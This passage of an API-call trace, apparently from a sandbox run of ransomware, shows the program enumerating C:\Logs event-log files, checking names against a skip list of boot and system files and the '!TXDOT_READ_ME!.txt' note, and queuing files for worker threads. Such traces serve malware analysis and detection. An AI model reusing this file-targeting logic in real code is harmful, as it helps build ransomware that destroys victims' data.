(psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="..") returned 1 [0088.025] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.025] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.025] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" [0088.025] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned=".evtx" [0088.025] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="bootsect.bak") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="iconcache.db") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="thumbs.db") returned -1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2=" ransomware ") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2=" ransom ") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="debug.txt") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="boot.ini") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="desktop.ini") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="autorun.inf") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="ntuser.dat") returned -1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="ntldr") returned -1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="ntdetect.com") returned -1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="bootfont.bin") returned 1 [0088.025] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.025] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned=".evtx" [0088.025] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.025] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0088.085] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.085] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" [0088.085] SetEvent (hEvent=0x418) returned 1 [0088.085] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx", cAlternateFileName="MI54F1~1.EVT")) returned 1 [0088.085] StrCmpW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2=".") returned 1 [0088.085] StrCmpW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="..") returned 1 [0088.085] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.085] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.085] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppxPackaging%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" [0088.085] PathFindExtensionW (pszPath="Microsoft-Windows-AppxPackaging%4Operational.evtx") returned=".evtx" [0088.085] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.085] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.085] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.085] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.085] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.085] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2=" ransom ") returned 1 [0088.085] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="debug.txt") returned 1 [0088.086] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="boot.ini") returned 1 [0088.086] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.086] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.086] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.086] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="ntldr") returned -1 [0088.086] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.086] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.086] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.086] PathFindExtensionW (pszPath="Microsoft-Windows-AppxPackaging%4Operational.evtx") returned=".evtx" [0088.086] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.086] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0088.087] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.088] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" [0088.088] SetEvent (hEvent=0x410) returned 1 [0088.088] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cAlternateFileName="MI111F~1.EVT")) returned 1 [0088.088] StrCmpW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2=".") returned 1 [0088.088] StrCmpW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="..") returned 1 [0088.088] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.088] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.088] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" [0088.088] PathFindExtensionW (pszPath="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned=".evtx" [0088.088] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2=" ransom ") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="debug.txt") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="boot.ini") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="ntldr") returned -1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.088] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.088] PathFindExtensionW (pszPath="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned=".evtx" [0088.089] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.089] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0088.104] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.104] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" [0088.104] SetEvent (hEvent=0x418) returned 1 [0088.104] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx", cAlternateFileName="MI9465~1.EVT")) returned 1 [0088.104] StrCmpW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2=".") returned 1 [0088.104] StrCmpW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="..") returned 1 [0088.104] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.104] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.104] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Bits-Client%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" [0088.104] PathFindExtensionW (pszPath="Microsoft-Windows-Bits-Client%4Operational.evtx") returned=".evtx" [0088.104] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2=" ransom ") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="debug.txt") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="boot.ini") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="ntldr") returned -1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.104] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.104] PathFindExtensionW (pszPath="Microsoft-Windows-Bits-Client%4Operational.evtx") returned=".evtx" [0088.104] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.104] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0088.106] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.106] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" [0088.106] SetEvent (hEvent=0x410) returned 1 [0088.107] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cAlternateFileName="MI03A7~1.EVT")) returned 1 [0088.107] StrCmpW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2=".") returned 1 [0088.107] StrCmpW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="..") returned 1 [0088.107] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.107] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.107] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" [0088.107] PathFindExtensionW (pszPath="Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned=".evtx" [0088.107] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.107] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.107] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.107] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.107] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.107] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2=" ransom ") returned 1 [0088.107] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="debug.txt") returned 1 [0088.107] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="boot.ini") returned 1 [0088.107] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.108] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.108] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.108] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="ntldr") returned -1 [0088.108] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.108] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.108] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.108] PathFindExtensionW (pszPath="Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned=".evtx" [0088.108] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.108] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0088.115] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.116] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" [0088.116] SetEvent (hEvent=0x3fc) returned 1 [0088.116] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cAlternateFileName="MI5CA2~1.EVT")) returned 1 [0088.116] StrCmpW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2=".") returned 1 [0088.116] StrCmpW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="..") returned 1 [0088.116] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.116] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.116] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" [0088.116] PathFindExtensionW (pszPath="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned=".evtx" [0088.116] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.116] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.116] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.116] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2=" ransom ") returned 1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="debug.txt") returned 1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="boot.ini") returned 1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="ntldr") returned -1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.117] StrCmpIW (psz1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.117] PathFindExtensionW (pszPath="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned=".evtx" [0088.117] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.117] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0088.129] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.129] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" [0088.129] SetEvent (hEvent=0x418) returned 1 [0088.129] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cAlternateFileName="MI5FD1~1.EVT")) returned 1 [0088.129] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2=".") returned 1 [0088.129] StrCmpW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="..") returned 1 [0088.129] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.129] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.129] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" [0088.129] PathFindExtensionW (pszPath="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned=".evtx" [0088.129] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="bootsect.bak") returned 1 [0088.129] StrCmpIW (psz1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", psz2="iconcache.db") returned 1 [0088.129] StrCmpIW 